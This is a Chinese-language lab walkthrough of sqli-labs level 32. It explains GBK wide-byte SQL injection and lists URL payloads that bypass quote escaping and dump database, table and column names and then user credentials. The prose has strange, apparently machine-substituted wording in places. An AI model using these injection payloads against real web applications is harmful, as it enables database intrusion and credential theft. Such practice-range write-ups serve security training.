sqlilab —— 32关卡
sqlilab靶场 —— 第32关使用宽字节的用法举行SQL注入
宽字节是什么
“宽字节” 本质是多字节字符编码(如 GBK、GB2312、Big5 等)的平凡叫法,这类编码以2 个字节为单位体现一个字符(区别于 ASCII 单字节编码,仅用 1 个字节)。
[*]单字节(ASCII):仅覆盖 0-127 的字符(如数字、英笔墨母),每个字符占 1 字节;
[*]宽字节(如 GBK):覆盖中文、日文等双字节字符,范围包罗0x8140-0xFEFE(扫除部门无效区间),且第一个字节高位为 1(即≥0x80),第二个字节无欺凌限定。
宽字节注入的焦点触发点:宽字节编码会将单字节的转义符(如\,ASCII 码 0x5c)与前一个字节拼接成一个合法的宽字节字符,从而绕过单引号 / 双引号的转义防护,实现 SQL 注入。
判定注入范例
先一步举行测试
?id=1'https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjQxMTk5OS0xNTgyMTEzMDMzLnBuZw==
进一步使用宽字节举行测试
?id=1%df'https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjQwMDY0My05NjQwMjg5MzYucG5n
获取数据库信息
判定命据表有几列
?id=1%df' ORDER BY 3 --+https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjM1NDc2Ni05Nzg3MTEzMDYucG5n
进一步判定有没有更多的列:
?id=1%df' order by 4 --+https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjM0OTIyMi0xMzc5OTUxNjgucG5n
结论:只有三列
判定哪几列可以大概使用
?id=-1%df' UNION SELECT 1,2,3 --+https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjM0MjM3OC0xOTQwNDA4NjMxLnBuZw==
爆破数据库名
?id=-1%df' UNION SELECT 1,database(),3 --+https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjMzNjI0OS0xOTAwMjk1MjIucG5n
爆表名
?id=-1%df' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=0x7365637572697479 --+https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjMyOTY1NS0zNjM2NjkxNDYucG5n
爆字段名
?id=-1%df' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema=0x7365637572697479 and table_name=0x7573657273 --+https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjMxNzczMi0xNTYxNjYyODMucG5n
获取目标信息
?id=-1%df' UNION SELECT 1,group_concat(concat_ws(0x3a,username,password)),3 FROM security.users --+https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWcyMDI0LmNuYmxvZ3MuY29tL2Jsb2cvMzczODc4OC8yMDI1MTIvMzczODc4OC0yMDI1MTIxNDIxMjI0ODc3Mi01Njg2MzYzMjMucG5n
免责声明:如果侵犯了您的权益,请联系站长及时删除侵权内容,谢谢合作!qidao123.com:ToB企服之家,中国第一个企服评测及软件市场,开放入驻,技术点评得现金.
页:
[1]